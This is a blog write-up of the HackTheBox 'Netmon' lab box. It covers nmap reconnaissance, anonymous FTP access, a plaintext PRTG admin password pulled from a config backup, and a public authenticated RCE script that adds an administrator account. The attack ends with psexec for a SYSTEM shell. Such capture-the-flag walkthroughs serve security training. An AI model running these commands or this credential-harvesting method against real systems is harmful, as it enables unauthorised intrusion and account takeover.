HackTheBox Netmon write-up

(Difficulty: Easy)

Reconnaissance


PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=6/29%OT=21%CT=1%CU=30483%PV=Y%DS=2%DC=T%G=Y%TM=5D17979
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=
OS:A)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M5
OS:4DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)

Uptime guess: 0.769 days (since Fri Jun 28 17:26:42 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -7m14s, deviation: 0s, median: -7m14s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-06-29 11:46:32
|_  start_date: 2019-06-28 17:19:45
nmap -A -v -sS -f -T4 -p- -oN nmap.txt 10.10.10.152

From the initial scan I can see that the root of the main drive is being served on FTP to anonymous users so I decide to look around for files with credentials/hashes.

ftp -p 10.10.10.152 with user as 'Anonymous' and password can be anything. I attempted to upload a web shell backdoor but it appears the FTP service is only permitting read-only access and I am unable to enter privileged locations such as the Administrator's home directory which would also imply I also lack the privileges access SAM hashes to crack.

I remember there was an application named PRTG Network Monitor running on port 80 so I decide to look around for it's location for potential credentials in configuration files.

After some navigation using cd and ls I was able to find PRTG Network Monitor's location cd "Program Files (x86)"

Unable to find anything useful, I resort to researching this application. A quick Google search reveals a post on Reddit which discusses plain-text passwords being exposed in a specific version of PRTG Network Monitor.

I navigate to the directory which may be affected by this disclosure cd "ProgramData\Paessler\PRTG Network Monitor"

And I find two files which may have credentials PRTG Configuration.old and PRTG Configuration.old.bak. I decide to download the second file due to the age of the file being in 2018 which was during the same year of the Reddit post which indicates a higher possibility of correlating to the vulnerable version get "PRTG Configuration.old.bak". I exit the FTP interactive client after the transfer is completed.

After some brief research on PRTG Network Monitor I learned that the default admin username is prtgadmin so I used that knowledge to narrow down my search in the downloaded file by looking for content 4 sentences before and after the matching username egrep -i -A 4 -B 4 prtgadmin 'PRTG Configuration.old.bak'

<!-- User: prtgadmin -->
PrTg@dmin2018

Those credentials fail but I decide to be a little creative and change the year in the password to 2019 as the admin user may have been lazy with the password convention.

PrTg@dmin2019

I am able to login, though, the application is very slow and unstable.

At first glance there does not appear to be any conventional way to execute code in the Administrative tools or any functions. At the bottom left I notice the version 18.1.37.13946 and I decide to look for any authenticated exploits searchsploit PRTG Network Monitor 18

PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution

Well that's convenient!

The next step is to download the PoC for this vulnerability searchsploit -m 46527.sh and convert the script's line feeds from Windows to Linux/Unix dos2unix 46527.sh. The script requires cookies from the authenticated session and the easy way to get that in most modern browsers is by using the developer console (F12). For Firefox's developer console, go to Storage, Cookies, and then copy the name and value of the cookie and supply it as an argument to the script.

Elevated foothold


The next steps are to download the PoC for this vulnerability searchsploit -m 46527.sh and convert the script's line feeds from Windows to Linux/Unix dos2unix 46527.sh. The script requires cookies from the authenticated session and the easy way to get that in most browsers is by using the F12 developer console. In Firefox's developer console, go to Storage, Cookies, and then copy the name and value of the cookie and supply it as a argument to the script. The script will add a new user named pentest with the password P3nT3st! and then add that user to the local Administrators group by exploiting the notification vulnerability in PRTG Network Monitor. So I execute the script

./46527.sh -u http://10.10.10.152 -c "OCTOPUS1813713946=e0EzQjkxMjAwLUNGQkEtNDdCNS05N0VDLTFDNTM4QzIyMTM1N30%3D"

And the user is added. The next step is to obtain a shell. I will use Impacket's psexec.py to authenticate with the newly made Administrator credentials and obtain a session as SYSTEM. If you don't have Impacket, you can download and install it with sudo pip install impacket. I quote the password in the command to prevent the ! symbol from being taken literally by bash.

psexec.py pentest:"P3nT3st!"@10.10.10.152

And finally to grab the flags type C:\Users\Public\Desktop\user.txt C:\Users\Administrator\Desktop\root.txt

This box is a good reminder to create more unpredictable passwords and to keep applications updated especially if they are running with elevated privileges.

Special thanks to mrb3n for this machine!

Thanks for reading :)

Author image
I like popping shells and setting up cloud stuff

Recent Posts

HackTheBox Fortune write-up
September 07, 2019
HackTheBox Netmon write-up
June 30, 2019
HackTheBox Querier write-up
June 22, 2019
HackTheBox Help write-up
June 08, 2019